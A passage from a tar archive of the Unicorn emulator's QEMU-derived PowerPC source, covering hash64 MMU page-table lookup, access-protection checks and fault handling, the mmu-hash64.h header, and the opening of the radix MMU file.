/* Only recent MMUs implement Virtual Page Class Key Protection */ if (!ppc_hash64_has(cpu, PPC_HASH64_AMR)) { return prot; } key = HPTE64_R_KEY(pte.pte1); amrbits = (env->spr[SPR_AMR] >> 2 * (31 - key)) & 0x3; /* fprintf(stderr, "AMR protection: key=%d AMR=0x%" PRIx64 "\n", key, */ /* env->spr[SPR_AMR]); */ /* * A store is permitted if the AMR bit is 0. Remove write * protection if it is set. */ if (amrbits & 0x2) { prot &= ~PAGE_WRITE; } /* * A load is permitted if the AMR bit is 0. Remove read * protection if it is set. */ if (amrbits & 0x1) { prot &= ~PAGE_READ; } switch (env->mmu_model) { /* * MMU version 2.07 and later support IAMR * Check if the IAMR allows the instruction access - it will return * PAGE_EXEC if it doesn't (and thus that bit will be cleared) or 0 * if it does (and prot will be unchanged indicating execution support). */ case POWERPC_MMU_2_07: case POWERPC_MMU_3_00: prot &= ppc_hash64_iamr_prot(cpu, key); break; default: break; } return prot; } const ppc_hash_pte64_t *ppc_hash64_map_hptes(PowerPCCPU *cpu, hwaddr ptex, int n) { hwaddr pte_offset = ptex * HASH_PTE_SIZE_64; hwaddr base; hwaddr plen = n * HASH_PTE_SIZE_64; const ppc_hash_pte64_t *hptes; #if 0 if (cpu->vhyp) { PPCVirtualHypervisorClass *vhc = PPC_VIRTUAL_HYPERVISOR_GET_CLASS(cpu->vhyp); return vhc->map_hptes(cpu->vhyp, ptex, n); } #endif base = ppc_hash64_hpt_base(cpu); if (!base) { return NULL; } hptes = address_space_map(CPU(cpu)->as, base + pte_offset, &plen, false, MEMTXATTRS_UNSPECIFIED); if (plen < (n * HASH_PTE_SIZE_64)) { fprintf(stderr, "%s: Unable to map all requested HPTEs\n", __func__); } return hptes; } void ppc_hash64_unmap_hptes(PowerPCCPU *cpu, const ppc_hash_pte64_t *hptes, hwaddr ptex, int n) { #if 0 if (cpu->vhyp) { PPCVirtualHypervisorClass *vhc = PPC_VIRTUAL_HYPERVISOR_GET_CLASS(cpu->vhyp); vhc->unmap_hptes(cpu->vhyp, hptes, ptex, n); return; } #endif address_space_unmap(CPU(cpu)->as, (void *)hptes, n * HASH_PTE_SIZE_64, false, n * HASH_PTE_SIZE_64); } static unsigned hpte_page_shift(const PPCHash64SegmentPageSizes *sps, uint64_t pte0, uint64_t pte1) { int i; if (!(pte0 & HPTE64_V_LARGE)) { if (sps->page_shift != 12) { /* 4kiB page in a non 4kiB segment */ return 0; } /* Normal 4kiB page */ return 12; } for (i = 0; i < PPC_PAGE_SIZES_MAX_SZ; i++) { const PPCHash64PageSize *ps = &sps->enc[i]; uint64_t mask; if (!ps->page_shift) { break; } if (ps->page_shift == 12) { /* L bit is set so this can't be a 4kiB page */ continue; } mask = ((1ULL << ps->page_shift) - 1) & HPTE64_R_RPN; if ((pte1 & mask) == ((uint64_t)ps->pte_enc << HPTE64_R_RPN_SHIFT)) { return ps->page_shift; } } return 0; /* Bad page size encoding */ } static void ppc64_v3_new_to_old_hpte(target_ulong *pte0, target_ulong *pte1) { /* Insert B into pte0 */ *pte0 = (*pte0 & HPTE64_V_COMMON_BITS) | ((*pte1 & HPTE64_R_3_0_SSIZE_MASK) << (HPTE64_V_SSIZE_SHIFT - HPTE64_R_3_0_SSIZE_SHIFT)); /* Remove B from pte1 */ *pte1 = *pte1 & ~HPTE64_R_3_0_SSIZE_MASK; } static hwaddr ppc_hash64_pteg_search(PowerPCCPU *cpu, hwaddr hash, const PPCHash64SegmentPageSizes *sps, target_ulong ptem, ppc_hash_pte64_t *pte, unsigned *pshift) { int i; const ppc_hash_pte64_t *pteg; target_ulong pte0, pte1; target_ulong ptex; ptex = (hash & ppc_hash64_hpt_mask(cpu)) * HPTES_PER_GROUP; pteg = ppc_hash64_map_hptes(cpu, ptex, HPTES_PER_GROUP); if (!pteg) { return -1; } for (i = 0; i < HPTES_PER_GROUP; i++) { pte0 = ppc_hash64_hpte0(cpu, pteg, i); /* * pte0 contains the valid bit and must be read before pte1, * otherwise we might see an old pte1 with a new valid bit and * thus an inconsistent hpte value */ smp_rmb(); pte1 = ppc_hash64_hpte1(cpu, pteg, i); /* Convert format if necessary */ if (cpu->env.mmu_model == POWERPC_MMU_3_00) { ppc64_v3_new_to_old_hpte(&pte0, &pte1); } /* This compares V, B, H (secondary) and the AVPN */ if (HPTE64_V_COMPARE(pte0, ptem)) { *pshift = hpte_page_shift(sps, pte0, pte1); /* * If there is no match, ignore the PTE, it could simply * be for a different segment size encoding and the * architecture specifies we should not match. Linux will * potentially leave behind PTEs for the wrong base page * size when demoting segments. */ if (*pshift == 0) { continue; } /* * We don't do anything with pshift yet as qemu TLB only * deals with 4K pages anyway */ pte->pte0 = pte0; pte->pte1 = pte1; ppc_hash64_unmap_hptes(cpu, pteg, ptex, HPTES_PER_GROUP); return ptex + i; } } ppc_hash64_unmap_hptes(cpu, pteg, ptex, HPTES_PER_GROUP); /* * We didn't find a valid entry. */ return -1; } static hwaddr ppc_hash64_htab_lookup(PowerPCCPU *cpu, ppc_slb_t *slb, target_ulong eaddr, ppc_hash_pte64_t *pte, unsigned *pshift) { CPUPPCState *env = &cpu->env; hwaddr hash, ptex; uint64_t vsid, epnmask, epn, ptem; const PPCHash64SegmentPageSizes *sps = slb->sps; /* * The SLB store path should prevent any bad page size encodings * getting in there, so: */ assert(sps); /* If ISL is set in LPCR we need to clamp the page size to 4K */ if (env->spr[SPR_LPCR] & LPCR_ISL) { /* We assume that when using TCG, 4k is first entry of SPS */ sps = &cpu->hash64_opts->sps[0]; assert(sps->page_shift == 12); } epnmask = ~((1ULL << sps->page_shift) - 1); if (slb->vsid & SLB_VSID_B) { /* 1TB segment */ vsid = (slb->vsid & SLB_VSID_VSID) >> SLB_VSID_SHIFT_1T; epn = (eaddr & ~SEGMENT_MASK_1T) & epnmask; hash = vsid ^ (vsid << 25) ^ (epn >> sps->page_shift); } else { /* 256M segment */ vsid = (slb->vsid & SLB_VSID_VSID) >> SLB_VSID_SHIFT; epn = (eaddr & ~SEGMENT_MASK_256M) & epnmask; hash = vsid ^ (epn >> sps->page_shift); } ptem = (slb->vsid & SLB_VSID_PTEM) | ((epn >> 16) & HPTE64_V_AVPN); ptem |= HPTE64_V_VALID; /* Page address translation */ qemu_log_mask(CPU_LOG_MMU, "htab_base " TARGET_FMT_plx " htab_mask " TARGET_FMT_plx " hash " TARGET_FMT_plx "\n", ppc_hash64_hpt_base(cpu), ppc_hash64_hpt_mask(cpu), hash); /* Primary PTEG lookup */ qemu_log_mask(CPU_LOG_MMU, "0 htab=" TARGET_FMT_plx "/" TARGET_FMT_plx " vsid=" TARGET_FMT_lx " ptem=" TARGET_FMT_lx " hash=" TARGET_FMT_plx "\n", ppc_hash64_hpt_base(cpu), ppc_hash64_hpt_mask(cpu), vsid, ptem, hash); ptex = ppc_hash64_pteg_search(cpu, hash, sps, ptem, pte, pshift); if (ptex == -1) { /* Secondary PTEG lookup */ ptem |= HPTE64_V_SECONDARY; qemu_log_mask(CPU_LOG_MMU, "1 htab=" TARGET_FMT_plx "/" TARGET_FMT_plx " vsid=" TARGET_FMT_lx " api=" TARGET_FMT_lx " hash=" TARGET_FMT_plx "\n", ppc_hash64_hpt_base(cpu), ppc_hash64_hpt_mask(cpu), vsid, ptem, ~hash); ptex = ppc_hash64_pteg_search(cpu, ~hash, sps, ptem, pte, pshift); } return ptex; } unsigned ppc_hash64_hpte_page_shift_noslb(PowerPCCPU *cpu, uint64_t pte0, uint64_t pte1) { int i; if (!(pte0 & HPTE64_V_LARGE)) { return 12; } /* * The encodings in env->sps need to be carefully chosen so that * this gives an unambiguous result. */ for (i = 0; i < PPC_PAGE_SIZES_MAX_SZ; i++) { const PPCHash64SegmentPageSizes *sps = &cpu->hash64_opts->sps[i]; unsigned shift; if (!sps->page_shift) { break; } shift = hpte_page_shift(sps, pte0, pte1); if (shift) { return shift; } } return 0; } static bool ppc_hash64_use_vrma(CPUPPCState *env) { switch (env->mmu_model) { case POWERPC_MMU_3_00: /* * ISAv3.0 (POWER9) always uses VRMA, the VPM0 field and RMOR * register no longer exist */ return true; default: return !!(env->spr[SPR_LPCR] & LPCR_VPM0); } } static void ppc_hash64_set_isi(CPUState *cs, uint64_t error_code) { CPUPPCState *env = &POWERPC_CPU(cs)->env; bool vpm; if (msr_ir) { vpm = !!(env->spr[SPR_LPCR] & LPCR_VPM1); } else { vpm = ppc_hash64_use_vrma(env); } if (vpm && !msr_hv) { cs->exception_index = POWERPC_EXCP_HISI; } else { cs->exception_index = POWERPC_EXCP_ISI; } env->error_code = error_code; } static void ppc_hash64_set_dsi(CPUState *cs, uint64_t dar, uint64_t dsisr) { CPUPPCState *env = &POWERPC_CPU(cs)->env; bool vpm; if (msr_dr) { vpm = !!(env->spr[SPR_LPCR] & LPCR_VPM1); } else { vpm = ppc_hash64_use_vrma(env); } if (vpm && !msr_hv) { cs->exception_index = POWERPC_EXCP_HDSI; env->spr[SPR_HDAR] = dar; env->spr[SPR_HDSISR] = dsisr; } else { cs->exception_index = POWERPC_EXCP_DSI; env->spr[SPR_DAR] = dar; env->spr[SPR_DSISR] = dsisr; } env->error_code = 0; } static void ppc_hash64_set_r(PowerPCCPU *cpu, hwaddr ptex, uint64_t pte1) { hwaddr base, offset = ptex * HASH_PTE_SIZE_64 + 16; #if 0 if (cpu->vhyp) { PPCVirtualHypervisorClass *vhc = PPC_VIRTUAL_HYPERVISOR_GET_CLASS(cpu->vhyp); vhc->hpte_set_r(cpu->vhyp, ptex, pte1); return; } #endif base = ppc_hash64_hpt_base(cpu); /* The HW performs a non-atomic byte update */ #ifdef UNICORN_ARCH_POSTFIX glue(stb_phys, UNICORN_ARCH_POSTFIX)(cpu->env.uc, CPU(cpu)->as, base + offset, ((pte1 >> 8) & 0xff) | 0x01); #else stb_phys(cpu->env.uc, CPU(cpu)->as, base + offset, ((pte1 >> 8) & 0xff) | 0x01); #endif } static void ppc_hash64_set_c(PowerPCCPU *cpu, hwaddr ptex, uint64_t pte1) { hwaddr base, offset = ptex * HASH_PTE_SIZE_64 + 15; #if 0 if (cpu->vhyp) { PPCVirtualHypervisorClass *vhc = PPC_VIRTUAL_HYPERVISOR_GET_CLASS(cpu->vhyp); vhc->hpte_set_c(cpu->vhyp, ptex, pte1); return; } #endif base = ppc_hash64_hpt_base(cpu); /* The HW performs a non-atomic byte update */ #ifdef UNICORN_ARCH_POSTFIX glue(stb_phys, UNICORN_ARCH_POSTFIX)(cpu->env.uc, CPU(cpu)->as, base + offset, (pte1 & 0xff) | 0x80); #else stb_phys(cpu->env.uc, CPU(cpu)->as, base + offset, (pte1 & 0xff) | 0x80); #endif } static target_ulong rmls_limit(PowerPCCPU *cpu) { CPUPPCState *env = &cpu->env; /* * In theory the meanings of RMLS values are implementation * dependent. In practice, this seems to have been the set from * POWER4+..POWER8, and RMLS is no longer supported in POWER9. * * Unsupported values mean the OS has shot itself in the * foot. Return a 0-sized RMA in this case, which we expect * to trigger an immediate DSI or ISI */ static const target_ulong rma_sizes[16] = { [0] = 256 * GiB, [1] = 16 * GiB, [2] = 1 * GiB, [3] = 64 * MiB, [4] = 256 * MiB, [7] = 128 * MiB, [8] = 32 * MiB, }; target_ulong rmls = (env->spr[SPR_LPCR] & LPCR_RMLS) >> LPCR_RMLS_SHIFT; return rma_sizes[rmls]; } static int build_vrma_slbe(PowerPCCPU *cpu, ppc_slb_t *slb) { CPUPPCState *env = &cpu->env; target_ulong lpcr = env->spr[SPR_LPCR]; uint32_t vrmasd = (lpcr & LPCR_VRMASD) >> LPCR_VRMASD_SHIFT; target_ulong vsid = SLB_VSID_VRMA | ((vrmasd << 4) & SLB_VSID_LLP_MASK); int i; for (i = 0; i < PPC_PAGE_SIZES_MAX_SZ; i++) { const PPCHash64SegmentPageSizes *sps = &cpu->hash64_opts->sps[i]; if (!sps->page_shift) { break; } if ((vsid & SLB_VSID_LLP_MASK) == sps->slb_enc) { slb->esid = SLB_ESID_V; slb->vsid = vsid; slb->sps = sps; return 0; } } #if 0 error_report("Bad page size encoding in LPCR[VRMASD]; LPCR=0x" TARGET_FMT_lx"\n", lpcr); #endif return -1; } int ppc_hash64_handle_mmu_fault(PowerPCCPU *cpu, vaddr eaddr, int rwx, int mmu_idx) { CPUState *cs = CPU(cpu); CPUPPCState *env = &cpu->env; ppc_slb_t vrma_slbe; ppc_slb_t *slb; unsigned apshift; hwaddr ptex; ppc_hash_pte64_t pte; int exec_prot, pp_prot, amr_prot, prot; const int need_prot[] = {PAGE_READ, PAGE_WRITE, PAGE_EXEC}; hwaddr raddr; assert((rwx == 0) || (rwx == 1) || (rwx == 2)); /* * Note on LPCR usage: 970 uses HID4, but our special variant of * store_spr copies relevant fields into env->spr[SPR_LPCR]. * Similarily we filter unimplemented bits when storing into LPCR * depending on the MMU version. This code can thus just use the * LPCR "as-is". */ /* 1. Handle real mode accesses */ if (((rwx == 2) && (msr_ir == 0)) || ((rwx != 2) && (msr_dr == 0))) { /* * Translation is supposedly "off", but in real mode the top 4 * effective address bits are (mostly) ignored */ raddr = eaddr & 0x0FFFFFFFFFFFFFFFULL; #if 0 if (cpu->vhyp) { /* * In virtual hypervisor mode, there's nothing to do: * EA == GPA == qemu guest address */ } else #endif if (msr_hv || !env->has_hv_mode) { /* In HV mode, add HRMOR if top EA bit is clear */ if (!(eaddr >> 63)) { raddr |= env->spr[SPR_HRMOR]; } } else if (ppc_hash64_use_vrma(env)) { /* Emulated VRMA mode */ slb = &vrma_slbe; if (build_vrma_slbe(cpu, slb) != 0) { /* Invalid VRMA setup, machine check */ cs->exception_index = POWERPC_EXCP_MCHECK; env->error_code = 0; return 1; } goto skip_slb_search; } else { target_ulong limit = rmls_limit(cpu); /* Emulated old-style RMO mode, bounds check against RMLS */ if (raddr >= limit) { if (rwx == 2) { ppc_hash64_set_isi(cs, SRR1_PROTFAULT); } else { int dsisr = DSISR_PROTFAULT; if (rwx == 1) { dsisr |= DSISR_ISSTORE; } ppc_hash64_set_dsi(cs, eaddr, dsisr); } return 1; } raddr |= env->spr[SPR_RMOR]; } tlb_set_page(cs, eaddr & TARGET_PAGE_MASK, raddr & TARGET_PAGE_MASK, PAGE_READ | PAGE_WRITE | PAGE_EXEC, mmu_idx, TARGET_PAGE_SIZE); return 0; } /* 2. Translation is on, so look up the SLB */ slb = slb_lookup(cpu, eaddr); if (!slb) { /* No entry found, check if in-memory segment tables are in use */ if (ppc64_use_proc_tbl(cpu)) { /* TODO - Unsupported */ fprintf(stderr, "Segment Table Support Unimplemented"); exit(1); } /* Segment still not found, generate the appropriate interrupt */ if (rwx == 2) { cs->exception_index = POWERPC_EXCP_ISEG; env->error_code = 0; } else { cs->exception_index = POWERPC_EXCP_DSEG; env->error_code = 0; env->spr[SPR_DAR] = eaddr; } return 1; } skip_slb_search: /* 3. Check for segment level no-execute violation */ if ((rwx == 2) && (slb->vsid & SLB_VSID_N)) { ppc_hash64_set_isi(cs, SRR1_NOEXEC_GUARD); return 1; } /* 4. Locate the PTE in the hash table */ ptex = ppc_hash64_htab_lookup(cpu, slb, eaddr, &pte, &apshift); if (ptex == -1) { if (rwx == 2) { ppc_hash64_set_isi(cs, SRR1_NOPTE); } else { int dsisr = DSISR_NOPTE; if (rwx == 1) { dsisr |= DSISR_ISSTORE; } ppc_hash64_set_dsi(cs, eaddr, dsisr); } return 1; } qemu_log_mask(CPU_LOG_MMU, "found PTE at index %08" HWADDR_PRIx "\n", ptex); /* 5. Check access permissions */ exec_prot = ppc_hash64_pte_noexec_guard(cpu, pte); pp_prot = ppc_hash64_pte_prot(cpu, slb, pte); amr_prot = ppc_hash64_amr_prot(cpu, pte); prot = exec_prot & pp_prot & amr_prot; if ((need_prot[rwx] & ~prot) != 0) { /* Access right violation */ qemu_log_mask(CPU_LOG_MMU, "PTE access rejected\n"); if (rwx == 2) { int srr1 = 0; if (PAGE_EXEC & ~exec_prot) { srr1 |= SRR1_NOEXEC_GUARD; /* Access violates noexec or guard */ } else if (PAGE_EXEC & ~pp_prot) { srr1 |= SRR1_PROTFAULT; /* Access violates access authority */ } if (PAGE_EXEC & ~amr_prot) { srr1 |= SRR1_IAMR; /* Access violates virt pg class key prot */ } ppc_hash64_set_isi(cs, srr1); } else { int dsisr = 0; if (need_prot[rwx] & ~pp_prot) { dsisr |= DSISR_PROTFAULT; } if (rwx == 1) { dsisr |= DSISR_ISSTORE; } if (need_prot[rwx] & ~amr_prot) { dsisr |= DSISR_AMR; } ppc_hash64_set_dsi(cs, eaddr, dsisr); } return 1; } qemu_log_mask(CPU_LOG_MMU, "PTE access granted !\n"); /* 6. Update PTE referenced and changed bits if necessary */ if (!(pte.pte1 & HPTE64_R_R)) { ppc_hash64_set_r(cpu, ptex, pte.pte1); } if (!(pte.pte1 & HPTE64_R_C)) { if (rwx == 1) { ppc_hash64_set_c(cpu, ptex, pte.pte1); } else { /* * Treat the page as read-only for now, so that a later write * will pass through this function again to set the C bit */ prot &= ~PAGE_WRITE; } } /* 7. Determine the real address from the PTE */ raddr = deposit64(pte.pte1 & HPTE64_R_RPN, 0, apshift, eaddr); tlb_set_page(cs, eaddr & TARGET_PAGE_MASK, raddr & TARGET_PAGE_MASK, prot, mmu_idx, 1ULL << apshift); return 0; } hwaddr ppc_hash64_get_phys_page_debug(PowerPCCPU *cpu, target_ulong addr) { CPUPPCState *env = &cpu->env; ppc_slb_t vrma_slbe; ppc_slb_t *slb; hwaddr ptex, raddr; ppc_hash_pte64_t pte; unsigned apshift; /* Handle real mode */ if (msr_dr == 0) { /* In real mode the top 4 effective address bits are ignored */ raddr = addr & 0x0FFFFFFFFFFFFFFFULL; #if 0 if (cpu->vhyp) { /* * In virtual hypervisor mode, there's nothing to do: * EA == GPA == qemu guest address */ return raddr; } else #endif if ((msr_hv || !env->has_hv_mode) && !(addr >> 63)) { /* In HV mode, add HRMOR if top EA bit is clear */ return raddr | env->spr[SPR_HRMOR]; } else if (ppc_hash64_use_vrma(env)) { /* Emulated VRMA mode */ slb = &vrma_slbe; if (build_vrma_slbe(cpu, slb) != 0) { return -1; } } else { target_ulong limit = rmls_limit(cpu); /* Emulated old-style RMO mode, bounds check against RMLS */ if (raddr >= limit) { return -1; } return raddr | env->spr[SPR_RMOR]; } } else { slb = slb_lookup(cpu, addr); if (!slb) { return -1; } } ptex = ppc_hash64_htab_lookup(cpu, slb, addr, &pte, &apshift); if (ptex == -1) { return -1; } return deposit64(pte.pte1 & HPTE64_R_RPN, 0, apshift, addr) & TARGET_PAGE_MASK; } void ppc_hash64_tlb_flush_hpte(PowerPCCPU *cpu, target_ulong ptex, target_ulong pte0, target_ulong pte1) { /* * XXX: given the fact that there are too many segments to * invalidate, and we still don't have a tlb_flush_mask(env, n, * mask) in QEMU, we just invalidate all TLBs */ cpu->env.tlb_need_flush = TLB_NEED_GLOBAL_FLUSH | TLB_NEED_LOCAL_FLUSH; } void ppc_store_lpcr(PowerPCCPU *cpu, target_ulong val) { PowerPCCPUClass *pcc = POWERPC_CPU_GET_CLASS(cpu); CPUPPCState *env = &cpu->env; env->spr[SPR_LPCR] = val & pcc->lpcr_mask; } void helper_store_lpcr(CPUPPCState *env, target_ulong val) { PowerPCCPU *cpu = env_archcpu(env); ppc_store_lpcr(cpu, val); } void ppc_hash64_init(PowerPCCPU *cpu) { #ifndef NDEBUG CPUPPCState *env = &cpu->env; #endif PowerPCCPUClass *pcc = POWERPC_CPU_GET_CLASS(cpu); if (!pcc->hash64_opts) { #ifndef NDEBUG assert(!(env->mmu_model & POWERPC_MMU_64)); #endif return; } cpu->hash64_opts = g_memdup(pcc->hash64_opts, sizeof(*cpu->hash64_opts)); } void ppc_hash64_finalize(PowerPCCPU *cpu) { g_free(cpu->hash64_opts); } const PPCHash64Options ppc_hash64_opts_basic = { .flags = 0, .slb_size = 64, .sps = { { .page_shift = 12, /* 4K */ .slb_enc = 0, .enc = { { .page_shift = 12, .pte_enc = 0 } } }, { .page_shift = 24, /* 16M */ .slb_enc = 0x100, .enc = { { .page_shift = 24, .pte_enc = 0 } } }, }, }; const PPCHash64Options ppc_hash64_opts_POWER7 = { .flags = PPC_HASH64_1TSEG | PPC_HASH64_AMR | PPC_HASH64_CI_LARGEPAGE, .slb_size = 32, .sps = { { .page_shift = 12, /* 4K */ .slb_enc = 0, .enc = { { .page_shift = 12, .pte_enc = 0 }, { .page_shift = 16, .pte_enc = 0x7 }, { .page_shift = 24, .pte_enc = 0x38 }, }, }, { .page_shift = 16, /* 64K */ .slb_enc = SLB_VSID_64K, .enc = { { .page_shift = 16, .pte_enc = 0x1 }, { .page_shift = 24, .pte_enc = 0x8 }, }, }, { .page_shift = 24, /* 16M */ .slb_enc = SLB_VSID_16M, .enc = { { .page_shift = 24, .pte_enc = 0 }, }, }, { .page_shift = 34, /* 16G */ .slb_enc = SLB_VSID_16G, .enc = { { .page_shift = 34, .pte_enc = 0x3 }, }, }, } }; void ppc_hash64_filter_pagesizes(PowerPCCPU *cpu, bool (*cb)(void *, uint32_t, uint32_t), void *opaque) { PPCHash64Options *opts = cpu->hash64_opts; int i; int n = 0; bool ci_largepage = false; assert(opts); n = 0; for (i = 0; i < ARRAY_SIZE(opts->sps); i++) { PPCHash64SegmentPageSizes *sps = &opts->sps[i]; int j; int m = 0; assert(n <= i); if (!sps->page_shift) { break; } for (j = 0; j < ARRAY_SIZE(sps->enc); j++) { PPCHash64PageSize *ps = &sps->enc[j]; assert(m <= j); if (!ps->page_shift) { break; } if (cb(opaque, sps->page_shift, ps->page_shift)) { if (ps->page_shift >= 16) { ci_largepage = true; } sps->enc[m++] = *ps; } } /* Clear rest of the row */ for (j = m; j < ARRAY_SIZE(sps->enc); j++) { memset(&sps->enc[j], 0, sizeof(sps->enc[j])); } if (m) { n++; } } /* Clear the rest of the table */ for (i = n; i < ARRAY_SIZE(opts->sps); i++) { memset(&opts->sps[i], 0, sizeof(opts->sps[i])); } if (!ci_largepage) { opts->flags &= ~PPC_HASH64_CI_LARGEPAGE; } } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/mmu-hash64.h����������������������������������������������������������0000664�0000000�0000000�00000014104�14675241067�0020265�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef MMU_HASH64_H #define MMU_HASH64_H #ifdef TARGET_PPC64 void dump_slb(PowerPCCPU *cpu); int ppc_store_slb(PowerPCCPU *cpu, target_ulong slot, target_ulong esid, target_ulong vsid); hwaddr ppc_hash64_get_phys_page_debug(PowerPCCPU *cpu, target_ulong addr); int ppc_hash64_handle_mmu_fault(PowerPCCPU *cpu, vaddr address, int rw, int mmu_idx); void ppc_hash64_tlb_flush_hpte(PowerPCCPU *cpu, target_ulong pte_index, target_ulong pte0, target_ulong pte1); unsigned ppc_hash64_hpte_page_shift_noslb(PowerPCCPU *cpu, uint64_t pte0, uint64_t pte1); void ppc_store_lpcr(PowerPCCPU *cpu, target_ulong val); void ppc_hash64_init(PowerPCCPU *cpu); void ppc_hash64_finalize(PowerPCCPU *cpu); void ppc_hash64_filter_pagesizes(PowerPCCPU *cpu, bool (*cb)(void *, uint32_t, uint32_t), void *opaque); #endif /* * SLB definitions */ /* Bits in the SLB ESID word */ #define SLB_ESID_ESID 0xFFFFFFFFF0000000ULL #define SLB_ESID_V 0x0000000008000000ULL /* valid */ /* Bits in the SLB VSID word */ #define SLB_VSID_SHIFT 12 #define SLB_VSID_SHIFT_1T 24 #define SLB_VSID_SSIZE_SHIFT 62 #define SLB_VSID_B 0xc000000000000000ULL #define SLB_VSID_B_256M 0x0000000000000000ULL #define SLB_VSID_B_1T 0x4000000000000000ULL #define SLB_VSID_VSID 0x3FFFFFFFFFFFF000ULL #define SLB_VSID_VRMA (0x0001FFFFFF000000ULL | SLB_VSID_B_1T) #define SLB_VSID_PTEM (SLB_VSID_B | SLB_VSID_VSID) #define SLB_VSID_KS 0x0000000000000800ULL #define SLB_VSID_KP 0x0000000000000400ULL #define SLB_VSID_N 0x0000000000000200ULL /* no-execute */ #define SLB_VSID_L 0x0000000000000100ULL #define SLB_VSID_C 0x0000000000000080ULL /* class */ #define SLB_VSID_LP 0x0000000000000030ULL #define SLB_VSID_ATTR 0x0000000000000FFFULL #define SLB_VSID_LLP_MASK (SLB_VSID_L | SLB_VSID_LP) #define SLB_VSID_4K 0x0000000000000000ULL #define SLB_VSID_64K 0x0000000000000110ULL #define SLB_VSID_16M 0x0000000000000100ULL #define SLB_VSID_16G 0x0000000000000120ULL /* * Hash page table definitions */ #define SDR_64_HTABORG 0x0FFFFFFFFFFC0000ULL #define SDR_64_HTABSIZE 0x000000000000001FULL #define PATE0_HTABORG 0x0FFFFFFFFFFC0000ULL #define HPTES_PER_GROUP 8 #define HASH_PTE_SIZE_64 16 #define HASH_PTEG_SIZE_64 (HASH_PTE_SIZE_64 * HPTES_PER_GROUP) #define HPTE64_V_SSIZE SLB_VSID_B #define HPTE64_V_SSIZE_256M SLB_VSID_B_256M #define HPTE64_V_SSIZE_1T SLB_VSID_B_1T #define HPTE64_V_SSIZE_SHIFT 62 #define HPTE64_V_AVPN_SHIFT 7 #define HPTE64_V_AVPN 0x3fffffffffffff80ULL #define HPTE64_V_AVPN_VAL(x) (((x) & HPTE64_V_AVPN) >> HPTE64_V_AVPN_SHIFT) #define HPTE64_V_COMPARE(x, y) (!(((x) ^ (y)) & 0xffffffffffffff83ULL)) #define HPTE64_V_BOLTED 0x0000000000000010ULL #define HPTE64_V_LARGE 0x0000000000000004ULL #define HPTE64_V_SECONDARY 0x0000000000000002ULL #define HPTE64_V_VALID 0x0000000000000001ULL #define HPTE64_R_PP0 0x8000000000000000ULL #define HPTE64_R_TS 0x4000000000000000ULL #define HPTE64_R_KEY_HI 0x3000000000000000ULL #define HPTE64_R_RPN_SHIFT 12 #define HPTE64_R_RPN 0x0ffffffffffff000ULL #define HPTE64_R_FLAGS 0x00000000000003ffULL #define HPTE64_R_PP 0x0000000000000003ULL #define HPTE64_R_N 0x0000000000000004ULL #define HPTE64_R_G 0x0000000000000008ULL #define HPTE64_R_M 0x0000000000000010ULL #define HPTE64_R_I 0x0000000000000020ULL #define HPTE64_R_W 0x0000000000000040ULL #define HPTE64_R_WIMG 0x0000000000000078ULL #define HPTE64_R_C 0x0000000000000080ULL #define HPTE64_R_R 0x0000000000000100ULL #define HPTE64_R_KEY_LO 0x0000000000000e00ULL #define HPTE64_R_KEY(x) ((((x) & HPTE64_R_KEY_HI) >> 57) | \ (((x) & HPTE64_R_KEY_LO) >> 9)) #define HPTE64_V_1TB_SEG 0x4000000000000000ULL #define HPTE64_V_VRMA_MASK 0x4001ffffff000000ULL /* Format changes for ARCH v3 */ #define HPTE64_V_COMMON_BITS 0x000fffffffffffffULL #define HPTE64_R_3_0_SSIZE_SHIFT 58 #define HPTE64_R_3_0_SSIZE_MASK (3ULL << HPTE64_R_3_0_SSIZE_SHIFT) struct ppc_hash_pte64 { uint64_t pte0, pte1; }; const ppc_hash_pte64_t *ppc_hash64_map_hptes(PowerPCCPU *cpu, hwaddr ptex, int n); void ppc_hash64_unmap_hptes(PowerPCCPU *cpu, const ppc_hash_pte64_t *hptes, hwaddr ptex, int n); static inline uint64_t ppc_hash64_hpte0(PowerPCCPU *cpu, const ppc_hash_pte64_t *hptes, int i) { return ldq_p(&(hptes[i].pte0)); } static inline uint64_t ppc_hash64_hpte1(PowerPCCPU *cpu, const ppc_hash_pte64_t *hptes, int i) { return ldq_p(&(hptes[i].pte1)); } /* * MMU Options */ struct PPCHash64PageSize { uint32_t page_shift; /* Page shift (or 0) */ uint32_t pte_enc; /* Encoding in the HPTE (>>12) */ }; typedef struct PPCHash64PageSize PPCHash64PageSize; struct PPCHash64SegmentPageSizes { uint32_t page_shift; /* Base page shift of segment (or 0) */ uint32_t slb_enc; /* SLB encoding for BookS */ PPCHash64PageSize enc[PPC_PAGE_SIZES_MAX_SZ]; }; struct PPCHash64Options { #define PPC_HASH64_1TSEG 0x00001 #define PPC_HASH64_AMR 0x00002 #define PPC_HASH64_CI_LARGEPAGE 0x00004 unsigned flags; unsigned slb_size; PPCHash64SegmentPageSizes sps[PPC_PAGE_SIZES_MAX_SZ]; }; extern const PPCHash64Options ppc_hash64_opts_basic; extern const PPCHash64Options ppc_hash64_opts_POWER7; static inline bool ppc_hash64_has(PowerPCCPU *cpu, unsigned feature) { return !!(cpu->hash64_opts->flags & feature); } #endif /* MMU_HASH64_H */ ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/mmu-radix64.c���������������������������������������������������������0000664�0000000�0000000�00000031126�14675241067�0020447�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * PowerPC Radix MMU mulation helpers for QEMU. * * Copyright (c) 2016 Suraj Jitindar Singh, IBM Corporation * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/exec-all.h" #include "exec/helper-proto.h" #include "mmu-radix64.h" #include "mmu-book3s-v3.h" static bool ppc_radix64_get_fully_qualified_addr(CPUPPCState *env, vaddr 